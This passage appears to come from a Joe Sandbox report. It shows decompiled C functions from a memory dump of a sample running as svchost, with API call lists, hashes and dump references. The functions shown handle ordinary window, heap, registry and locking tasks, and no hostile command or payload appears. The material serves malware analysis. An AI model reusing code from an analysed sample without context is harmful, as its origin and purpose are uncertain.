    • Instruction ID: 25f1ff0c61a8e3ad97143760a33ba726e8c87612978cfa0bfc94653251366302
    • Opcode Fuzzy Hash: 9a69ea20fbf7c2507d09341e4d7991d8e478e7cc6493a8661130b3bccb61907b
    • Instruction Fuzzy Hash: ED219A31201A00EFD725AF54E8C6F6E77A4FF84711F00886EE5428B2A1C7B9F841CB69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00414500 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00414500(void* __ecx, struct HWND__* _a4) {
				struct HWND__* _t5;
				struct HWND__* _t7;
				void* _t10;
				void* _t20;
				struct HWND__* _t21;

				_t5 = _a4;
				_t20 = __ecx;
				if(_t5 == 0) {
					L10:
					return _t5;
				}
				_t5 = GetTopWindow(_t5);
				_t21 = _t5;
				if(_t21 == 0) {
					goto L10;
				}
				do {
					if(E00414340(_t20, _t21, 0) != 0xffffffff) {
						_t10 = E00418A40(0x3ea,  *((intOrPtr*)(E004135B0(_t20 + 0x14, _t6, 0))), 0);
						if(_t10 != 0 && ( *(_t10 + 0x14) & 0x00000004) != 0 && SendMessageA(_t21, 0xf0, 0, 0) != 0) {
							SendMessageA(_t21, 0xf1, 0, 0);
						}
					}
					_t7 = GetWindow(_t21, 2);
					_t21 = _t7;
				} while (_t21 != 0);
				return _t7;
			}








    0x00414500
    0x00414506
    0x0041450a
    0x00414587
    0x00414587
    0x00414587
    0x0041450d
    0x00414513
    0x00414517
    0x00000000
    0x00000000
    0x00414527
    0x00414534
    0x0041454b
    0x00414552
    0x00414576
    0x00414576
    0x00414552
    0x0041457b
    0x0041457d
    0x0041457f
    0x00000000

    APIs
    • GetTopWindow.USER32(?), ref: 0041450D
      • Part of subcall function 00414340: IsChild.USER32(?,?), ref: 004143BD
      • Part of subcall function 00414340: GetParent.USER32(?), ref: 004143D7
    • SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 00414566
    • SendMessageA.USER32(00000000,000000F1,00000000,00000000), ref: 00414576
    • GetWindow.USER32(00000000,00000002), ref: 0041457B
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: MessageSendWindow$ChildParent
    • String ID:
    • API String ID: 1043810220-0
    • Opcode ID: 2026899e5a2a366cb5344a0a64e87c292c1dfc17ac4a8e64f5e90b1653b16cd7
    • Instruction ID: 3b53422f05a903dfff9b6eb4f1596fe668536504e091219a3006d073657e5b04
    • Opcode Fuzzy Hash: 2026899e5a2a366cb5344a0a64e87c292c1dfc17ac4a8e64f5e90b1653b16cd7
    • Instruction Fuzzy Hash: A2017C317C171277E231962A9C96FEB725D5F91B61F150237BB00AB2D0DFA8ED8081AD
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00478DBA Relevance: 6.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE
    Download Yara Rule
    C-Code - Quality: 100%
    			E00478DBA() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x4e1c7c; // 0x0
				_t26 =  *0x4e1c6c; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x4e1c80; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = RtlAllocateHeap( *0x4e1c88, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x4e1c7c =  *0x4e1c7c + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x4e1c88, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = RtlReAllocateHeap( *0x4e1c88, 0,  *0x4e1c80, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x4e1c6c =  *0x4e1c6c + 0x10;
				 *0x4e1c80 = _t25;
				_t15 =  *0x4e1c7c; // 0x0
				goto L3;
			}










    0x00478dba
    0x00478dbf
    0x00478dcb
    0x00478dfd
    0x00478dfd
    0x00478e13
    0x00478e16
    0x00478e1e
    0x00478e21
    0x00478e4d
    0x00000000
    0x00478e4d
    0x00478e30
    0x00478e38
    0x00478e3b
    0x00478e51
    0x00478e55
    0x00478e57
    0x00478e5a
    0x00478e63
    0x00000000
    0x00478e66
    0x00478e47
    0x00000000
    0x00478e47
    0x00478dcd
    0x00478de2
    0x00478dea
    0x00000000
    0x00000000
    0x00478dec
    0x00478df3
    0x00478df8
    0x00000000

    APIs
    • RtlReAllocateHeap.NTDLL(00000000,00000050,?,00000000), ref: 00478DE2
    • RtlAllocateHeap.NTDLL(00000008,000041C4,?), ref: 00478E16
    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00478E30
    • HeapFree.KERNEL32(00000000,?), ref: 00478E47
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Heap$Allocate$AllocFreeVirtual
    • String ID:
    • API String ID: 94566200-0
    • Opcode ID: a25f75e2514465c74ee0b873b0dcb2e4289e6a3ae309cab6364895ba1d936b1f
    • Instruction ID: 40fc2d426208af2c800c2e6c6e8c6ffcbf897bfd310906779b9e46beb2a16428
    • Opcode Fuzzy Hash: a25f75e2514465c74ee0b873b0dcb2e4289e6a3ae309cab6364895ba1d936b1f
    • Instruction Fuzzy Hash: 851130712C0241EFD7218F29ECC996A7BB5FB557507604A3EF165CA1B1CB70A852CF18
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00482230 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E00482230(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				intOrPtr _t18;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x =  *_t8;
				_t18 =  *((intOrPtr*)(_t8 + 4));
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t21 = GetParent(_t24);
					if(_t21 == 0 || E0048A70B(_t21, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t22 = E0048A780(_t24, _v12.x, _v12.y);
						if(_t22 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t22);
							_t9 = _t22;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t21;
					}
				}
				return _t9;
			}











    0x00482235
    0x0048223c
    0x0048223f
    0x00482242
    0x00482243
    0x00482248
    0x0048224e
    0x00482252
    0x0048225b
    0x0048225f
    0x00482276
    0x00482288
    0x0048228c
    0x0048229b
    0x0048229b
    0x0048228e
    0x0048228f
    0x00482297
    0x00482299
    0x00000000
    0x00000000
    0x00482299
    0x0048226d
    0x0048226d
    0x0048226d
    0x0048225f
    0x004822a0

    APIs
    • WindowFromPoint.USER32(?,?), ref: 00482248
    • GetParent.USER32(00000000), ref: 00482255
    • ScreenToClient.USER32(00000000,?), ref: 00482276
    • IsWindowEnabled.USER32(00000000), ref: 0048228F
      • Part of subcall function 0048A70B: GetWindowLongA.USER32(00000000,000000F0), ref: 0048A71C
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$ClientEnabledFromLongParentPointScreen
    • String ID:
    • API String ID: 2204725058-0
    • Opcode ID: f8587a662c33b38dde11d865b38d0211dcb214c64353e07737c9007f452a0951
    • Instruction ID: a660a90db80995f9f3884b7d5d4cc6e97f1e7fa762f1e29824edec837ec7056f
    • Opcode Fuzzy Hash: f8587a662c33b38dde11d865b38d0211dcb214c64353e07737c9007f452a0951
    • Instruction Fuzzy Hash: 7401D436600510BF9702BB989E04CAF7BB9EF85700B14057AF904D3310DBB8CD01A7A9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004862EB Relevance: 6.0, APIs: 4, Instructions: 49COMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E004862EB(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t12;
				void* _t15;
				struct HWND__* _t17;
				struct HWND__* _t18;
				void* _t19;

				_t15 = __ecx;
				_t17 = GetDlgItem(_a4, _a8);
				if(_t17 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t18 = _t10;
						if(_t18 == 0) {
							break;
						}
						_t12 = E004862EB(_t15, _t18, _a8, _a12);
						if(_t12 == 0) {
							_t10 = GetWindow(_t18, 2);
							continue;
						}
						goto L11;
					}
					return 0;
				} else {
					if(GetTopWindow(_t17) == 0) {
						L3:
						_push(_t17);
						if(_a12 == 0) {
							return E00484C84(_t19);
						}
						_t12 = E00484CAB();
						if(_t12 == 0) {
							goto L6;
						}
					} else {
						_t12 = E004862EB(_t15, _t17, _a8, _a12);
						if(_t12 == 0) {
							goto L3;
						}
					}
				}
				L11:
				return _t12;
			}










    0x004862eb
    0x00486302
    0x00486306
    0x00486336
    0x00486339
    0x0048633b
    0x0048633b
    0x0048633f
    0x00000000
    0x00000000
    0x00486348
    0x0048634f
    0x00486354
    0x00000000
    0x00486354
    0x00000000
    0x0048634f
    0x00000000
    0x00486308
    0x0048630d
    0x0048631f
    0x00486323
    0x00486324
    0x00000000
    0x00486326
    0x0048632d
    0x00486334
    0x00000000
    0x00000000
    0x0048630f
    0x00486316
    0x0048631d
    0x00000000
    0x00000000
    0x0048631d
    0x0048630d
    0x00486361
    0x00486361

    APIs
    • GetDlgItem.USER32(?,?), ref: 004862F6
    • GetTopWindow.USER32(00000000), ref: 00486309
    • GetTopWindow.USER32(?), ref: 00486339
    • GetWindow.USER32(00000000,00000002), ref: 00486354
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$Item
    • String ID:
    • API String ID: 369458955-0
    • Opcode ID: 0bd35543a12f95d67ae62ee11f00b210916aae7f3b22fd38440f457221d353ae
    • Instruction ID: e3163fbfbd5a25cdb38e2c0c4693c0e2a66b93898c248ca97732c6f68ae4b48b
    • Opcode Fuzzy Hash: 0bd35543a12f95d67ae62ee11f00b210916aae7f3b22fd38440f457221d353ae
    • Instruction Fuzzy Hash: A401A732401215B7CF623F659D09E9F3B5AAF50360F0A4837FD0092221D73AC921979D
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00486364 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
    Download Yara Rule
    C-Code - Quality: 64%
    			E00486364(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				void* _t22;
				struct HWND__* _t24;

				_t22 = __edx;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t24 = _t16;
					if(_t24 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t24, _a8, _a12, _a16);
					} else {
						_push(_t24);
						_t20 = E00484CAB();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E00484AB9(_t22);
						}
					}
					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
						E00486364(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t24, 2);
				}
				return _t16;
			}








    0x00486364
    0x00486372
    0x00486374
    0x00486374
    0x00486378
    0x00000000
    0x00000000
    0x0048637e
    0x004863a8
    0x00486380
    0x00486380
    0x00486381
    0x00486388
    0x0048638a
    0x0048638d
    0x00486390
    0x00486393
    0x00486396
    0x00486397
    0x00486397
    0x00486388
    0x004863b2
    0x004863cb
    0x004863cb
    0x004863d3
    0x004863d3
    0x004863de

    APIs
    • GetTopWindow.USER32(?), ref: 00486372
    • SendMessageA.USER32(00000000,?,?,?), ref: 004863A8
    • GetTopWindow.USER32(00000000), ref: 004863B5
    • GetWindow.USER32(00000000,00000002), ref: 004863D3
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$MessageSend
    • String ID:
    • API String ID: 1496643700-0
    • Opcode ID: 9869f1ad92d6d31a5f006ee0701729fe18173bd2dd7b78f7386e45280a2c11db
    • Instruction ID: d6db060dfee8cc4bb89813d6d4a26f9ec472bced044f8d064611e0254a032a43
    • Opcode Fuzzy Hash: 9869f1ad92d6d31a5f006ee0701729fe18173bd2dd7b78f7386e45280a2c11db
    • Instruction Fuzzy Hash: E701483200161ABBCF526F91ED04EDF3B2AAF44350F064822FE00A1161C77AD971FBA9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048B08D Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0048B08D(void* __ecx, CHAR* _a4, CHAR* _a8, char _a12) {
				char _v20;
				void* _t17;
				long _t19;
				void* _t27;
				void* _t28;

				_t27 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					wsprintfA( &_v20, 0x49d29c, _a12);
					return WritePrivateProfileStringA(_a4, _a8,  &_v20,  *(_t27 + 0x90));
				}
				_t17 = E0048DA44(__ecx, _a4);
				_t28 = _t17;
				if(_t28 != 0) {
					_t19 = RegSetValueExA(_t28, _a8, 0, 4,  &_a12, 4);
					RegCloseKey(_t28);
					return 0 | _t19 == 0x00000000;
				}
				return _t17;
			}








    0x0048b094
    0x0048b09a
    0x0048b0de
    0x00000000
    0x0048b0f7
    0x0048b09f
    0x0048b0a4
    0x0048b0a8
    0x0048b0b9
    0x0048b0c2
    0x00000000
    0x0048b0cf
    0x0048b0ff

    APIs
    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0048B0B9
    • RegCloseKey.ADVAPI32(00000000,?,?), ref: 0048B0C2
    • wsprintfA.USER32 ref: 0048B0DE
    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0048B0F7
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ClosePrivateProfileStringValueWritewsprintf
    • String ID:
    • API String ID: 1902064621-0
    • Opcode ID: c1f0a037787ab0202993814b43c3c3525385f6dd9a9de1a02aa3b4a22ab55705
    • Instruction ID: 81c24fc35da97b50ac7cd1b77676c273c49e8e3efeb54ae759e7f93a53c550ef
    • Opcode Fuzzy Hash: c1f0a037787ab0202993814b43c3c3525385f6dd9a9de1a02aa3b4a22ab55705
    • Instruction Fuzzy Hash: 9901AD32400219BFCB216F64DC09FEF3BA8EF04714F044936BA25A61A0DBB4D960CBC8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004804CA Relevance: 6.0, APIs: 4, Instructions: 43COMMON
    Download Yara Rule
    C-Code - Quality: 42%
    			E004804CA(void* __ecx) {
				long _t1;
				long _t4;
				long _t10;
				void* _t11;

				_t1 =  *0x4e1ba8; // 0x2
				_t11 = __ecx;
				_t10 = 2;
				if(_t1 != _t10) {
					__eflags = _t1;
					if(_t1 != 0) {
						while(1) {
							L7:
							__eflags =  *0x4e1ba8 - 1;
							if( *0x4e1ba8 != 1) {
								break;
							}
							Sleep(1);
						}
						__eflags =  *0x4e1ba8 - _t10; // 0x2
						if(__eflags != 0) {
							L12:
							return _t11;
						}
						L10:
						_push(0x4e1b90);
						L11:
						 *0x49224c();
						goto L12;
					}
					_t4 = InterlockedExchange(0x4e1ba8, 1);
					__eflags = _t4;
					if(__eflags != 0) {
						__eflags = _t4 - _t10;
						if(_t4 == _t10) {
							 *0x4e1ba8 = _t10;
						}
						goto L7;
					}
					 *0x492298(0x4e1b90);
					E004719EB(__eflags, E00480548);
					 *0x4e1ba8 = _t10;
					goto L10;
				}
				_push(0x4e1b90);
				goto L11;
			}







    0x004804ca
    0x004804d4
    0x004804d6
    0x004804d9
    0x004804e2
    0x004804e9
    0x00480520
    0x00480520
    0x00480520
    0x00480527
    0x00000000
    0x00000000
    0x0048052b
    0x0048052b
    0x00480533
    0x00480539
    0x00480542
    0x00480547
    0x00480547
    0x0048053b
    0x0048053b
    0x0048053c
    0x0048053c
    0x00000000
    0x0048053c
    0x004804f2
    0x004804f8
    0x004804fa
    0x00480516
    0x00480518
    0x0048051a
    0x0048051a
    0x00000000
    0x00480518
    0x004804fd
    0x00480508
    0x0048050e
    0x00000000
    0x0048050e
    0x004804db
    0x00000000

    APIs
    • InterlockedExchange.KERNEL32(004E1BA8,00000001), ref: 004804F2
    • RtlInitializeCriticalSection.NTDLL(004E1B90), ref: 004804FD
    • RtlEnterCriticalSection.NTDLL(004E1B90), ref: 0048053C
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CriticalSection$EnterExchangeInitializeInterlocked
    • String ID:
    • API String ID: 3643093385-0
    • Opcode ID: ccfbb566fb34b1dabfdecdeb917c75ae0d5000d8a0e27e5d334f344a5e6eca3d
    • Instruction ID: 4e39601ea56557fc0ee243e34feb105befa07c5858b6b76e72c31ced4062fb10
    • Opcode Fuzzy Hash: ccfbb566fb34b1dabfdecdeb917c75ae0d5000d8a0e27e5d334f344a5e6eca3d
    • Instruction Fuzzy Hash: 24F0A4B1B90250BFC761A759BDC566F3654E7507A3B300837F14584573E2B858898B2D
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00486A53 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00486A53(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t18;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0048A70B(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						_t18 = 1;
						return _t18;
					}
				}
			}








    0x00486a5d
    0x00486ac2
    0x00000000
    0x00486a65
    0x00486a65
    0x00486a6b
    0x00000000
    0x00486a88
    0x00486a91
    0x00486a9d
    0x00486aa3
    0x00486aa9
    0x00486aad
    0x00486aad
    0x00486ab7
    0x00486abf
    0x00000000
    0x00486abf
    0x00486a6b

    APIs
    • GetObjectA.GDI32(00000000,0000000C,?), ref: 00486A91
    • SetBkColor.GDI32(00000000,00000000), ref: 00486A9D
    • GetSysColor.USER32(00000008), ref: 00486AAD
    • SetTextColor.GDI32(00000000,?), ref: 00486AB7
      • Part of subcall function 0048A70B: GetWindowLongA.USER32(00000000,000000F0), ref: 0048A71C
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
